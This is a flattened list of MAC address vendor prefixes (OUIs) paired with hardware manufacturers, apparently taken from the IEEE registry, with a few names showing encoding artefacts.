Shenzhen Voxtech Co.,Ltd E0F5CA CHENG UEI PRECISION INDUSTRY CO.,LTD. A8EF26 Tritonwave 20DC93 Cheetah Hi-Tech, Inc. 4423AA Farmage Co., Ltd. 7CFE28 Salutron Inc. E8102E Really Simple Software, Inc 0C565C HyBroad Vision (Hong Kong) Technology Co Ltd 8C6AE4 Viogem Limited 543968 Edgewater Networks Inc 440CFD NetMan Co., Ltd. 8CD3A2 VisSim AS D82DE1 Tricascade Inc. 14358B Mediabridge Products, LLC. 00F403 Orbis Systems Oy 547398 Toyo Electronics Corporation E0A30F Pevco 88DC96 SENAO Networks, Inc. 20443A Schneider Electric Asia Pacific Ltd C4393A SMC Networks Inc 5C2479 Baltech AG EC9327 MEMMERT GmbH + Co. KG A0EF84 Seine Image Int'l Co., Ltd 64517E LONG BEN (DONGGUAN) ELECTRONIC TECHNOLOGY CO.,LTD. D43D7E Micro-Star Int'l Co, Ltd ACD9D6 tci GmbH 48282F zte corporation 60CBFB AirScape Inc. 7C160D Saia-Burgess Controls AG A497BB Hitachi Industrial Equipment Systems Co.,Ltd 4C5427 Linepro Sp. z o.o. 80D18B Hangzhou I'converge Technology Co.,Ltd 4088E0 Beijing Ereneben Information Technology Limited Shenzhen Branch E85484 NEO Information Systems Co., Ltd. 74AE76 iNovo Broadband, Inc. EC1A59 Belkin International Inc. 881036 Panodic(ShenZhen) Electronics Limted 68B6FC Hitron Technologies. Inc ECA29B Kemppi Oy 04CE14 Wilocity LTD. C4BA99 I+ME Actia Informatik und Mikro-Elektronik GmbH A4934C Cisco Systems, Inc D0D212 K2NET Co.,Ltd. B0435D NuLEDs, Inc. 0808EA AMSC E8D483 ULTIMATE Europe Transportation Equipment GmbH 1C8464 FORMOSA WIRELESS COMMUNICATION CORP. 346E8A Ecosense 64F242 Gerdes Aktiengesellschaft 60F281 TRANWO TECHNOLOGY CO., LTD. 942197 Stalmart Technology Limited A0C3DE Triton Electronic Systems Ltd. D0699E LUMINEX Lighting Control Equipment 0CC0C0 MAGNETI MARELLI SISTEMAS ELECTRONICOS MEXICO 08379C Topaz Co. LTD. D80DE3 FXI TECHNOLOGIES AS B0D2F5 Vello Systems, Inc. 709A0B Italian Institute of Technology F0FDA0 Acurix Networks Pty Ltd B45570 Borea 100D2F Online Security Pty. Ltd. 142DF5 Amphitech 5057A8 Cisco Systems, Inc 00DEFB Cisco Systems, Inc 3CA315 Bless Information & Communications Co., Ltd F83094 Alcatel-Lucent Telecom Limited 10A932 Beijing Cyber Cloud Technology Co. ,Ltd. 34FC6F ALCEA C0B357 Yoshiki Electronics Industry Ltd. 3C98BF Quest Controls, Inc. D0AEEC Alpha Networks Inc. E81324 GuangZhou Bonsoninfo System CO.,LTD E477D4 Minrray Industry Co.,Ltd 38E08E Mitsubishi Electric Corporation E4C806 Ceiec Electric Technology Inc. E0F9BE Cloudena Corp. B88F14 Analytica GmbH 7C94B2 Philips Healthcare PCCI 442B03 Cisco Systems, Inc F473CA Conversion Sound Inc. F8F7FF SYN-TECH SYSTEMS INC A81758 Elektronik System i UmeÃ¥ AB 882012 LMI Technologies 60E956 Ayla Networks, Inc EC1120 FloDesign Wind Turbine Corporation F897CF DAESHIN-INFORMATION TECHNOLOGY CO., LTD. 08B4CF Abicom International C495A2 SHENZHEN WEIJIU INDUSTRY AND TRADE DEVELOPMENT CO., LTD 8C6878 Nortek-AS 202598 Teleview 38F8B7 V2COM PARTICIPACOES S.A. F8D462 Pumatronix Equipamentos Eletronicos Ltda. A0DC04 Becker-Antriebe GmbH 40605A Hawkeye Tech Co. Ltd A04CC1 Helixtech Corp. 34A7BA Fischer International Systems Corporation 0463E0 Nome Oy B49EE6 SHENZHEN TECHNOLOGY CO LTD BC4B79 SensingTek A49005 CHINA GREATWALL COMPUTER SHENZHEN CO.,LTD C40ACB Cisco Systems, Inc E86D6E voestalpine SIGNALING Fareham Ltd. 681605 Systems And Electronic Development FZCO D4A02A Cisco Systems, Inc 3C4E47 Etronic A/S F48771 Infoblox 5453ED Sony Corporation 00376D Murata Manufacturing Co., Ltd. 50008C Hong Kong Telecommunications (HKT) Limited 902B34 GIGA-BYTE TECHNOLOGY CO.,LTD. 88C36E Beijing Ereneben lnformation Technology Limited 4C9E80 KYOKKO ELECTRIC Co., Ltd. 5CEB4E R. STAHL HMI Systems GmbH 34AA99 Nokia 645563 Intelight Inc. 943AF0 Nokia Corporation 645422 Equinox Payments 080D84 GECO, Inc. 88E712 Whirlpool Corporation D412BB Quadrant Components Inc. Ltd 24B88C Crenus Co.,Ltd. BCFE8C Altronic, LLC 649EF3 Cisco Systems, Inc 24BBC1 Absolute Analysis 9CCAD9 Nokia Corporation 046D42 Bryston Ltd. D8E743 Wush, Inc 644D70 dSPACE GmbH DCC101 SOLiD Technologies, Inc. 3CE624 LG Display D8F0F2 Zeebo Inc 806007 RIM 38A851 Moog, Ing 94E0D0 HealthStream Taiwan Inc. D8052E Skyviia Corporation 80946C TOKYO RADAR CORPORATION D0CF5E Energy Micro AS 1803FA IBT Interfaces 306E5C Validus Technologies C894D2 Jiangsu DatangElectronic Products Co., Ltd C8A620 Nebula, Inc EC6264 Global411 Internet Services, LLC 00F051 KWB Gmbh FC946C UBIVELOX 407B1B Mettle Networks Inc. 40D559 MICRO S.E.R.I. 306CBE Skymotion Technology (HK) Limited 183825 Wuhan Lingjiu High-tech Co.,Ltd. 7C4B78 Red Sun Synthesis Pte Ltd 64A0E7 Cisco Systems, Inc DCF858 Lorent Networks, Inc. 940B2D NetView Technologies(Shenzhen) Co., Ltd 803F5D Winstars Technology Ltd 40BF17 Digistar Telecom. SA 780738 Z.U.K. Elzab S.A. 2037BC Kuipers Electronic Engineering BV 94319B Alphatronics BV 00E175 AK-Systems Ltd CC501C KVH Industries, Inc. 04D783 Y&H E&C Co.,LTD. 54A9D4 Minibar Systems B0E50E NRG SYSTEMS INC 64808B VG Controls, Inc. 48C1AC PLANTRONICS, INC. 98588A SYSGRATION Ltd. 2437EF EMC Electronic Media Communication SA 28B0CC Xenya d.o.o. 205B5E Shenzhen Wonhe Technology Co., Ltd C058A7 Pico Systems Co., Ltd. EC3F05 Institute 706, The Second Academy China Aerospace Science & Industry Corp 489BE2 SCI Innovations Ltd 80FFA8 UNIDIS E435FB Sabre Technology (Hull) Ltd C83B45 JRI E878A1 BEOVIEW INTERCOM DOO CCEF48 Cisco Systems, Inc F04B6A Scientific Production Association Siberian Arsenal, Ltd. 64AE0C Cisco Systems, Inc E8DA96 Zhuhai Tianrui Electrical Power Tech. Co., Ltd. B4D8DE iota Computing, Inc. C8903E Pakton Technologies 54CDA7 Fujian Shenzhou Electronic Co.,Ltd 886B76 CHINA HOPEFUL GROUP HOPEFUL ELECTRIC CO.,LTD 78F7D0 Silverbrook Research 207600 Actiontec Electronics, Inc F013C3 SHENZHEN FENDA TECHNOLOGY CO., LTD 04A82A Nokia Corporation E44E18 Gardasoft VisionLimited 2046A1 VECOW Co., Ltd FC01CD FUNDACION TEKNIKER 9C8BF1 The Warehouse Limited DC2E6A HCT. Co., Ltd. 148A70 ADS GmbH 00B338 Kontron Asia Pacific Design Sdn. Bhd 84248D Zebra Technologies Inc FCE892 Hangzhou Lancable Technology Co.,Ltd 1071F9 Cloud Telecomputers, LLC B8621F Cisco Systems, Inc F0022B Chrontel D453AF VIGO System S.A. 18AD4D Polostar Technology Corporation 94C6EB NOVA electronics, Inc. 843F4E Tri-Tech Manufacturing, Inc. C83232 Hunting Innova 549478 Silvershore Technology Partners A06E50 Nanotek Elektronik Sistemler Ltd. Sti. 4C774F Embedded Wireless Labs D0C282 Cisco Systems, Inc 147DB3 JOA TELECOM.CO.,LTD ECBD09 FUSION Electronics Ltd 944696 BaudTec Corporation 54847B Digital Devices GmbH 3C2763 SLE quality engineering GmbH & Co. KG B0F1BC Dhemax Ingenieros Ltda B8288B Parker Hannifin Manufacturing (UK) Ltd 90D11B Palomar Medical Technologies 34A55D TECHNOSOFT INTERNATIONAL SRL 802E14 azeti Networks AG D4C1FC Nokia Corporation 34BCA6 Beijing Ding Qing Technology, Ltd. 5835D9 Cisco Systems, Inc 64D912 Solidica, Inc. C47B2F Beijing JoinHope Image Technology Ltd. 508ACB SHENZHEN MAXMADE TECHNOLOGY CO., LTD. 3CD16E Telepower Communication Co., Ltd FC2E2D Lorom Industrial Co.LTD. 40040C A&T DC3C84 Ticom Geomatics, Inc. D0131E Sunrex Technology Corp 00FC70 Intrepid Control Systems, Inc. 703AD8 Shenzhen Afoundry Electronic Co., Ltd 704AAE Xstream Flow (Pty) Ltd 40B3FC Logital Co. Limited A4134E Luxul B09928 FUJITSU LIMITED 04E1C8 IMS Soluções em Energia Ltda. 948FEE Verizon Telematics 50D6D7 Takahata Precision 88F077 Cisco Systems, Inc 587521 CJSC RTSoft C40F09 Hermes electronic GmbH 48F47D TechVision HoldingInternation Limited F081AF IRZ AUTOMATION TECHNOLOGIES LTD 701404 Limited Liability Company B435F7 Zhejiang Pearmain Electronics Co.ltd. 9866EA Industrial Control Communications, Inc. 983000 Beijing KEMACOM Technologies Co., Ltd. 90CF15 Nokia Corporation 948B03 EAGET Innovation and Technology Co., Ltd. 2C0033 EControls, LLC AC199F SUNGROW POWER SUPPLY CO.,LTD. 7C4A82 Portsmith LLC 94E848 FYLDE MICRO LTD AC5E8C Utillink 18E288 STT Condigi 1C35F1 NEW Lift Neue Elektronische Wege Steuerungsbau GmbH 803457 OT Systems Limited 5C0CBB CELIZION Inc. C4242E Galvanic Applied Sciences Inc 24C86E Chaney Instrument Co. F0AE51 Xi3 Corp B80B9D ROPEX Industrie-Elektronik GmbH 306118 Paradom Inc. 4C7367 Genius Bytes Software Solutions GmbH 90EA60 SPI Lasers Ltd 5070E5 He Shan World Fair Electronics Technology Limited 802275 Beijing Beny Wave Technology Co Ltd CCF3A5 Chi Mei Communication Systems, Inc 14A9E3 MST CORPORATION F8EA0A Dipl.-Math. Michael Rauch 3831AC WEG 584C19 Chongqing Guohong Technology Development Company Limited 6469BC Hytera Communications Co .,ltd B4F323 PETATEL INC. 285132 Shenzhen Prayfly Technology Co.,Ltd E42FF6 Unicore communication Inc. 84D9C8 Unipattern Co., 94AAB8 Joview(Beijing) Technology Co. Ltd. 28F358 2C - Trifonov & Co 14C21D Sabtech Industries C88439 Sunrise Technologies F0BF97 Sony Corporation C44AD0 FIREFLIES SYSTEMS EC7D9D CPI C81E8E ADV Security (S) Pte Ltd A88792 Broadband Antenna Tracking Systems 14F0C5 Xtremio Ltd. E8C229 H-Displays (MSC) Bhd 3CA72B MRV Communications (Networks) LTD 301A28 Mako Networks Ltd 04E662 Acroname Inc. F87B8C Amped Wireless 283410 Enigma Diagnostics Limited 0CE82F Bonfiglioli Vectron GmbH 40F4EC Cisco Systems, Inc 14B73D ARCHEAN Technologies 948D50 Beamex Oy Ab A433D1 Fibrlink Communications Co.,Ltd. 5CBD9E HONGKONG MIRACLE EAGLE TECHNOLOGY(GROUP) LIMITED 08E672 JEBSEE ELECTRONICS CO.,LTD. B8E589 Payter BV 88E0A0 Shenzhen VisionSTOR Technologies Co., Ltd FC10BD Control Sistematizado S.A. F0C27C Mianyang Netop Telecom Equipment Co.,Ltd. 241A8C Squarehead Technology AS D44F80 Kemper Digital GmbH A41BC0 Fastec Imaging Corporation 205B2A Private F40321 BeNeXt B.V. A071A9 Nokia Corporation A4E32E Silicon & Software Systems Ltd. C8C126 ZPM Industria e Comercio Ltda 64DE1C Kingnetic Pte Ltd A862A2 JIWUMEDIA CO., LTD. 984E97 Starlight Marketing (H. K.) Ltd. 64DC01 Static Systems Group PLC FC1FC0 EURECAM BC6784 Environics Oy 68DCE8 PacketStorm Communications 488E42 DIGALOG GmbH 607688 Velodyne 78CD8E SMC Networks Inc 2C8065 HARTING Inc. of North America 3CC0C6 d&b audiotechnik GmbH 4468AB JUIN COMPANY, LIMITED F81037 Atopia Systems, LP 78A683 Precidata F02572 Cisco Systems, Inc 04FF51 NOVAMEDIA INNOVISION SP. Z O.O. 4CB4EA HRD (S) PTE., LTD. D44C24 Vuppalamritha Magnetic Components LTD F8C678 Carefusion 6CAB4D Digital Payment Technologies 2CB0DF Soliton Technologies Pvt Ltd ECE555 Hirschmann Automation 58F98E SECUDOS GmbH B4C44E VXL eTech Pvt Ltd 707EDE NASTEC LTD. C07E40 SHENZHEN XDK COMMUNICATION EQUIPMENT CO.,LTD E44F29 MA Lighting Technology GmbH B4749F ASKEY COMPUTER CORP 7C4AA8 MindTree Wireless PVT Ltd 8091C0 AgileMesh, Inc. E05FB9 Cisco Systems, Inc E0143E Modoosis Inc. 90D852 Comtec Co., Ltd. 380197 TSST Global,Inc AC02CF RW Tecnologia Industria e Comercio Ltda D41296 Anobit Technologies Ltd. 48174C MicroPower technologies 349A0D ZBD Displays Ltd 90507B Advanced PANMOBIL Systems GmbH & Co. KG 0876FF Thomson Telecom Belgium 1C7C11 EID 20AA25 IP-NET LLC C4EEF5 II-VI Incorporated E0CF2D Gemintek Corporation D491AF Electroacustica General Iberica, S.A. C4B512 General Electric Digital Energy 0034F1 Radicom Research, Inc. 9433DD Taco Inc E02538 Titan Pet Products CC7A30 CMAX Wireless Co., Ltd. B88E3A Infinite Technologies JLT 588D09 Cisco Systems, Inc C0C1C0 Cisco-Linksys, LLC 6015C7 IdaTech DC2008 ASD Electronics Ltd 1C83B0 Linked IP GmbH A4D1D1 ECOtality North America C49313 100fio networks technology llc 7C3920 SSOMA SECURITY 28C0DA Juniper Networks 9C77AA NADASNV 10E8EE PhaseSpace A47C1F Cobham plc D46CDA CSM GmbH 5CD998 D-Link Corporation 68597F Alcatel Lucent F065DD Primax Electronics Ltd. 706582 Suzhou Hanming Technologies Co., Ltd. 34D2C4 RENA GmbH Print Systeme D4CBAF Nokia Corporation 045D56 camtron industrial inc. 68234B Nihon Dengyo Kousaku 1C3DE7 Sigma Koki Co.,Ltd. 58BC27 Cisco Systems, Inc 20D607 Nokia Corporation 6CE0B0 SOUND4 9CFFBE OTSL Inc. 00F860 PT. Panggung Electric Citrabuana B8BA72 Cynove 443D21 Nuvolt 30493B Nanjing Z-Com Wireless Co.,Ltd A45C27 Nintendo Co., Ltd. 6C0460 RBH Access Technologies Inc. 706417 ORBIS TECNOLOGIA ELECTRICA S.A. 18EF63 Cisco Systems, Inc 206FEC Braemac CA LLC 100D32 Embedian, Inc. 88ACC1 Generiton Co., Ltd. 8818AE Tamron Co., Ltd 7CED8D Microsoft A4BE61 EutroVision System, Inc. D07DE5 Forward Pay Systems, Inc. 04DD4C Velocytech A40CC3 Cisco Systems, Inc 4CBAA3 Bison Electronics Inc. A8B1D4 Cisco Systems, Inc EC7C74 Justone Technologies Co., Ltd. CCFCB1 Wireless Technology, Inc. 3C1A79 Huayuan Technology CO.,LTD 7CF098 Bee Beans Technologies, Inc. EC66D1 B&W Group LTD 385FC3 Yu Jeong System, Co.Ltd 888B5D Storage Appliance Corporation 78C6BB Innovasic, Inc. 84A991 Cyber Trans Japan Co.,Ltd. 68784C Nortel Networks F8D756 Simm Tronic Limited 04A3F3 Emicon 1C17D3 Cisco Systems, Inc 7CE044 NEON Inc 284C53 Intune Networks 64D02D Next Generation Integration (NGI) 90513F Elettronica Santerno SpA 8841C1 ORBISAT DA AMAZONIA IND E AEROL SA 9C7514 Wildix srl 4CF737 SamJi Electronics Co., Ltd F0D767 Axema Passagekontroll AB C84C75 Cisco Systems, Inc C802A6 Beijing Newmine Technology 4C8B55 Grupo Digicon 6C5CDE SunReports, Inc. 34F39B WizLAN Ltd. E86CDA Supercomputers and Neurocomputers Research Center 240B2A Viettel Group 00B5D6 Omnibit Inc. 548922 Zelfy Inc 50C58D Juniper Networks 24A42C KOUKAAM a.s. 4C3089 Thales Transportation Systems GmbH 481249 Luxcom Technologies Inc. 24A937 PURE Storage 348302 iFORCOM Co., Ltd B43DB2 Degreane Horizon 84F64C Cross Point BV C08B6F S I Sistemas Inteligentes Eletrônicos Ltda F86ECF Arcx Inc 8C8401 Private 408493 Clavister AB 78A6BD DAEYEON Control&Instrument Co,.Ltd 3C1915 GFI Chrono Time ECB106 Acuro Networks, Inc C835B8 Ericsson, EAB/RWI/K F89D0D Control Technology Inc. 2C3F3E Alge-Timing GmbH 089F97 LEROY AUTOMATION 34BA51 Se-Kure Controls, Inc. 6C7039 Novar GmbH 982D56 Resolution Audio 147373 TUBITAK UEKAE FCCF62 IBM Corp 084E1C H2A Systems, LLC 88B627 Gembird Europe BV F06853 Integrated Corporation A4ADB8 Vitec Group, Camera Dynamics Ltd A4B121 Arantia 2010 S.L. E02636 Nortel Networks 5C57C8 Nokia Corporation D46CBF Goodrich ISR E02630 Intrigue Technologies, Inc. ECC882 Cisco Systems, Inc 6CFDB9 Proware Technologies Co Ltd. 10189E Elmo Motion Control 8C56C5 Nintendo Co., Ltd. CCB888 AnB Securite s.a. 6C5E7A Ubiquitous Internet Telecom Co., Ltd B42CBE Direct Payment Solutions Limited CC2218 InnoDigital Co., Ltd. C86C1E Display Systems Ltd A01859 Shenzhen Yidashi Electronics Co Ltd E8056D Nortel Networks C45976 Fugoo Coorporation 90A7C1 Pakedge Device and Software Inc. 80BAAC TeleAdapt Ltd 502DF4 Phytec Messtechnik GmbH 2CCD27 Precor Inc 104369 Soundmax Electronic Limited C06C0F Dobbs Stanford C86CB6 Optcom Co., Ltd. 5849BA Chitai Electronic Corp. 00D11C ACETEL 601D0F Midnite Solar A8F94B Eltex Enterprise Ltd. 0C8230 SHENZHEN MAGNUS TECHNOLOGIES CO.,LTD 746B82 MOVEK 9CC077 PrintCounts, LLC 3CB17F Wattwatchers Pty Ld CC5459 OnTime Networks AS F8DC7A Variscite LTD D4F143 IPROAD.,Inc B8F732 Aryaka Networks Inc E8DFF2 PRF Co., Ltd. B4ED54 Wohler Technologies 006440 Cisco Systems, Inc 94C4E9 PowerLayer Microsystems HongKong Limited 8843E1 Cisco Systems, Inc 34862A Heinz Lackmann GmbH & Co KG ACE348 MadgeTech, Inc 549A16 Uzushio Electric Co.,Ltd. 9018AE Shanghai Meridian Technologies, Co. Ltd. 0494A1 CATCH THE WIND INC 003A99 Cisco Systems, Inc 003A9A Cisco Systems, Inc 003A98 Cisco Systems, Inc 50A6E3 David Clark Company 50934F Gradual Tecnologia Ltda. B8B1C7 BT&COM CO.,LTD DC2C26 Iton Technology Limited D411D6 ShotSpotter, Inc. 9CAFCA Cisco Systems, Inc 1C0FCF Sypro Optics GmbH 9C4E8E ALT Systems Ltd 7072CF EdgeCore Networks ECD00E MiraeRecognition Co., Ltd. A4AD00 Ragsdale Technology 4C9EE4 Hanyang Navicom Co.,Ltd. C87248 Aplicom Oy C47D4F Cisco Systems, Inc 3CDF1E Cisco Systems, Inc 986DC8 TOSHIBA MITSUBISHI-ELECTRIC INDUSTRIAL SYSTEMS CORPORATION 6CAC60 Venetex Corp F04BF2 JTECH Communications, Inc. 042BBB PicoCELA, Inc. FC0877 Prentke Romich Company 64F970 Kenade Electronics Technology Co.,LTD. C82E94 Halfa Enterprise Co., Ltd. 80177D Nortel Networks 7C7BE4 Z'SEDAI KENKYUSHO CORPORATION F0DE71 Shanghai EDO Technologies Co.,Ltd. 60D30A Quatius Limited 24CF21 Shenzhen State Micro Technology Co., Ltd 10BAA5 GANA I&C CO., LTD BC9DA5 DASCOM Europe GmbH 28FBD3 Ragentek Technology Group 586ED6 Private EC3091 Cisco Systems, Inc 64BC11 CombiQ AB C8C13C RuggedTek Hangzhou Co., Ltd F4ACC1 Cisco Systems, Inc 4097D1 BK Electronics cc 0CE936 ELIMOS srl A02EF3 United Integrated Services Co., Led. A09805 OpenVox Communication Co Ltd 60391F ABB Ltd E8A4C1 Deep Sea Electronics Ltd C8D2C1 Jetlun (Shenzhen) Corporation E09153 XAVi Technologies Corp. 88A5BD QPCOM INC. D4C766 Acentic GmbH 002712 MaxVision LLC 00271F MIPRO Electronics Co., Ltd 00270C Cisco Systems, Inc 0026CF DEKA R&D 0026E7 Shanghai ONLAN Communication Tech. Co., Ltd. 0026E0 ASITEQ 002703 Testech Electronics Pte Ltd 0026F3 SMC Networks 0026A5 MICROROBOT.CO.,LTD 0026A3 FQ Ingenieria Electronica S.A. 00269D M2Mnet Co., Ltd. 002697 AlphaTechnologies Inc. 00268A Terrier SC Ltd 002689 General Dynamics Robotic Systems 0026C5 Guangdong Gosun Telecommunications Co.,Ltd 0026C4 Cadmos microsystems S.r.l. 0026C8 System Sensor 00267A wuhan hongxin telecommunication technologies co.,ltd 0026C2 SCDI Co. LTD 002685 Digital Innovation 0026A9 Strong Technologies Pty Ltd 002672 AAMP of America 0025FD OBR Centrum Techniki Morskiej S.A. 002600 TEAC Australia Pty Ltd. 0025FF CreNova Multimedia Co., Ltd 002604 Audio Processing Technology Ltd 002659 Nintendo Co., Ltd. 002651 Cisco Systems, Inc 002612 Space Exploration Technologies 002616 Rosemount Inc. 00260B Cisco Systems, Inc 002623 JRD Communication Inc 002627 Truesell 00264E Rail & Road Protec GmbH 00264F Krüger &Gothe GmbH 002621 InteliCloud Technology Inc. 00261C NEOVIA INC. 002664 Core System Japan 002639 T.M. Electronics, Inc. 0025C6 kasercorp, ltd 0025C5 Star Link Communication Pvt. Ltd. 0025C7 altek Corporation 0025E6 Belgian Monitoring Systems bvba 0025E0 CeedTec Sdn Bhd 0025DE Probits Co., LTD. 0025B0 Schmartz Inc 0025AD Manufacturing Resources International 0025AC I-Tech corporation 0025AB AIO LCD PC BU / TPV 0025EC Humanware 0025ED NuVo Technologies LLC 0025E9 i-mate Development, Inc. 0025BA Alcatel-Lucent IPD 0025BB INNERINT Co., Ltd. 0025B8 Agile Communications, Inc. 0025B1 Maya-Creation Corporation 0025A1 Enalasys 0025F3 Nordwestdeutsche Zählerrevision 0025DD SUNNYTEK INFORMATION CO., LTD. 0025CE InnerSpace 002549 Jeorich Tech. Co.,Ltd. 002539 IfTA GmbH 002537 Runcom Technologies Ltd. 002538 Samsung Electronics Co., Ltd., Memory Division 002544 LoJack Corporation 002532 Digital Recorders 00255D Morningstar Corporation 002558 MPEDIA 00254A RingCube Technologies, Inc. 00254F ELETTROLAB Srl 002583 Cisco Systems, Inc 002591 NEXTEK, Inc. 00258D Haier 002571 Zhejiang Tianle Digital Electric Co.,Ltd 00259A CEStronics GmbH 002502 NaturalPoint 0024F8 Technical Solutions Company Ltd. 0024F9 Cisco Systems, Inc 0024F2 Uniphone Telecommunication Co., Ltd. 002514 PC Worth Int'l Co., Ltd. 00250B CENTROFACTORINC 002506 A.I. ANTITACCHEGGIO ITALIA SRL 00251C EDT 00251A Psiber Data Systems Inc. 0024E1 Convey Computer Corp. 0024EE Wynmax Inc. 0024E3 CAO Group 002507 ASTAK Inc. 0024D9 BICOM, Inc. 00248E Infoware ZRt. 002494 Shenzhen Baoxin Tech CO., Ltd. 002489 Vodafone Omnitel N.V. 00246F Onda Communication spa 002469 Smart Doorphones 00247F Nortel Networks 002475 Compass System(Embedded Dept.) 0024C3 Cisco Systems, Inc 0024B5 Nortel Networks 0024B0 ESAB AB 0024C4 Cisco Systems, Inc 00249D NES Technology Inc. 002464 Bridge Technologies Co AS 002462 Rayzone Corporation 002420 NetUP Inc. 00241E Nintendo Co., Ltd. 00241F DCT-Delta GmbH 00240E Inventec Besta Co., Ltd. 002460 Giaval Science Development Co. Ltd. 00245C Design-Com Technologies Pty. Ltd. 00243D Emerson Appliance Motors and Controls 002437 Motorola - BSG 002444 Nintendo Co., Ltd. 002413 Cisco Systems, Inc 00244F Asantron Technologies Ltd. 0023DD ELGIN S.A. 0023DE Ansync Inc. 0023D9 Banner Engineering 0023DA Industrial Computer Source (Deutschland)GmbH 002405 Dilog Nordic AB 0023E8 Demco Corp. 0023E3 Microtronic AG 0023B7 Q-Light Co., Ltd. 0023FD AFT Atlas Fahrzeugtechnik GmbH 0023EF Zuend Systemtechnik AG 0023AC Cisco Systems, Inc 0023D8 Ball-It Oy 00239F Institut für Prüftechnik 00239D Mapower Electronics Co., Ltd 00239C Juniper Networks 002398 Vutlan sro 00235B Gulfstream 002359 Benchmark Electronics ( Thailand ) Public Company Limited 002357 Pitronot Technologies and Engineering P.T.E. Ltd. 002355 Kinco Automation(Shanghai) Ltd. 002373 GridIron Systems, Inc. 002367 UniControls a.s. 002368 Zebra Technologies Inc 00236E Burster GmbH & Co KG 002366 Beijing Siasun Electronic System Co.,Ltd. 00238F NIDEC COPAL CORPORATION 002380 Nanoteq 00233D Laird Technologies 00233F Purechoice Inc 00231B Danaher Motion - Kollmorgen 00231E Cezzer Multimedia Technologies 00231F Guangda Electronic & Telecommunication Technology Development Co., Ltd. 002270 ABK North America, LLC 002313 Qool Technologies Ltd. 002310 LNC Technology Co., Ltd. 0022CD Ared Technology Co., Ltd. 0022CC SciLog, Inc. 0022CB IONODES Inc. 0022C6 Sutus Inc 0022E8 Applition Co., Ltd. 0022E9 ProVision Communications 0022E6 Intelligent Data 0022E3 Amerigon 0022EB Data Respons A/S 0022EF iWDL Technologies 0022F2 SunPower Corp 0022E2 WABTEC Transit Division 002301 Witron Technology Limited 0022F7 Conceptronic 00230C CLOVER ELECTRONICS CO.,LTD. 002334 Cisco Systems, Inc 0022C8 Applied Instruments B.V. 0022C0 Shenzhen Forcelink Electronic Co, Ltd 0022A6 Sony Computer Entertainment America 0022A7 Tyco Electronics AMP GmbH 0022A1 Huawei Symantec Technologies Co.,Ltd. 00229D PYUNG-HWA IND.CO.,LTD 002296 LinoWave Corporation 002244 Chengdu Linkon Communications Device Co., Ltd 002250 Point Six Wireless, LLC 00226F 3onedata Technology Co. Ltd. 002278 ShenzhenTongfang MultimediaTechnology Co.,Ltd. 00227A Telecom Design 002260 AFREEY Inc. 0021EF Kapsys 0021ED Telegesis 0021EB ESP SYSTEMS, LLC 002237 Shinhint Group 00222F Open Grid Computing, Inc. 0021F6 Oracle Corporation 002206 Cyberdyne Inc. 002202 Excito Elektronik i SkÃ¥ne AB 002227 uv-electronic GmbH 00221E Media Devices Co., Ltd. 002225 Thales Avionics Ltd 002220 Mitac Technology Corp 00220E Indigo Security Co., Ltd. 002207 Inteno Broadband Technology AB 00223E IRTrans GmbH 0021CE NTC-Metrotek 0021CA ART System Co., Ltd. 0021CB SMS TECNOLOGIA ELETRONICA LTDA 0021C8 LOHUIS Networks 0021DB Santachi Video Technology (Shenzhen) Co., Ltd. 0021BF Hitachi High-Tech Control Systems Corporation 0021BC ZALA COMPUTER 0021B4 APRO MEDIA CO., LTD 0021A8 Telephonics Corporation 0021A9 Mobilink Telecom Co.,Ltd 00218D AP Router Ind. Eletronica LTDA 002190 Goliath Solutions 002185 MICRO-STAR INT'L CO.,LTD. 00219F SATEL OY 002196 TelseyS.p.A. 002182 SandLinks Systems, Ltd. 002183 ANDRITZ HYDRO GmbH 0021DF Martin Christ GmbH 0021D4 Vollmer Werke GmbH 0021D6 LXI Consortium 0021A6 Videotec Spa 002159 Juniper Networks 002155 Cisco Systems, Inc 002157 National Datacast, Inc. 00213B Berkshire Products, Inc 002137 Bay Controls, LLC 002139 Escherlogic Inc. 00212C SemIndia System Private Limited 00212B MSA Auer 002174 AvaLAN Wireless 002179 IOGEAR, Inc. 002168 iVeia, LLC 002150 EYEVIEW ELECTRONICS 00214D Guangzhou Skytone Transmission Technology Com. Ltd. 00212A Audiovox Corporation 00215E IBM Corp 001FF6 PS Audio International 002110 Clearbox Systems 00210C Cymtec Systems, Inc. 00210B GEMINI TRAZE RFID PVT. LTD. 001FDD GDI LLC 001FDA Nortel Networks 002104 Gigaset Communications GmbH 001FFB Green Packet Bhd 001FE9 Printrex, Inc. 001FF0 Audio Partnership 001FEA Applied Media Technologies Corporation 001FD9 RSD Communications Ltd 001FCE QTECH LLC 001F8B Cache IQ 001F85 Apriva ISS, LLC 001F87 Skydigital Inc. 001F88 FMS Force Measuring Systems AG 001F86 digEcor 001FA1 Gtran Inc 001F9F Thomson Telecom Belgium 001F99 SERONICS co.ltd 001F80 Lucas Holding bv 001B58 ACE CAD Enterprise Co., Ltd. 001FB0 TimeIPS, Inc. 001FAE Blick South Africa (Pty) Ltd 001F79 Lodam Electronics A/S 001F71 xG Technology, Inc. 001FA5 Blue-White Industries 001F9D Cisco Systems, Inc 001F96 APROTECH CO.LTD 001F6C Cisco Systems, Inc 001F6F Fujian Sunnada Communication Co.,Ltd. 001F60 COMPASS SYSTEMS CORP. 001F6A PacketFlux Technologies, Inc. 001F65 KOREA ELECTRIC TERMINAL CO., LTD. 001F17 IDX Company, Ltd. 001F1B RoyalTek Company Ltd. 001F5E Dyna Technology Co.,Ltd. 001F55 Honeywell Security (China) Co., Ltd. 001F54 Lorex Technology Inc. 001F2E Triangle Research Int'l Pte Ltd 001F4B Lineage Power 001F0D L3 Communications - Telemetry West 001EFC JSC MASSA-K 001F23 Interacoustics 001F06 Integrated Dispatch Solutions 001EBA High Density Devices AS 001EB8 Aloys, Inc 001EB4 UNIFAT TECHNOLOGY LTD. 001EDA Wesemann Elektrotechniek B.V. 001ED7 H-Stream Wireless, Inc. 001ED5 Tekon-Automatics 001EE8 Mytek 001EEE ETL Systems Ltd 001EFA PROTEI Ltd. 001EFB Trio Motion Technology Ltd 001EF8 Emfinity Inc. 001ECB RPC Energoautomatika Ltd 001EA8 Datang Mobile Communications Equipment CO.,LTD 001EAB TeleWell Oy 001E9F Visioneering Systems, Inc. 001E6B Cisco SPVTG 001E70 Cobham Antenna Systems 001E61 ITEC GmbH 001E3E KMW Inc. 001E38 Bluecard Software Technology Co., Ltd. 001E47 PT. Hariff Daya Tunggal Engineering 001E48 Wi-Links 001E8A eCopy, Inc 001E9B San-Eisha, Ltd. 001E96 Sepura Plc 001E59 Silicon Turnkey Express, LLC 001E51 Converter Industry 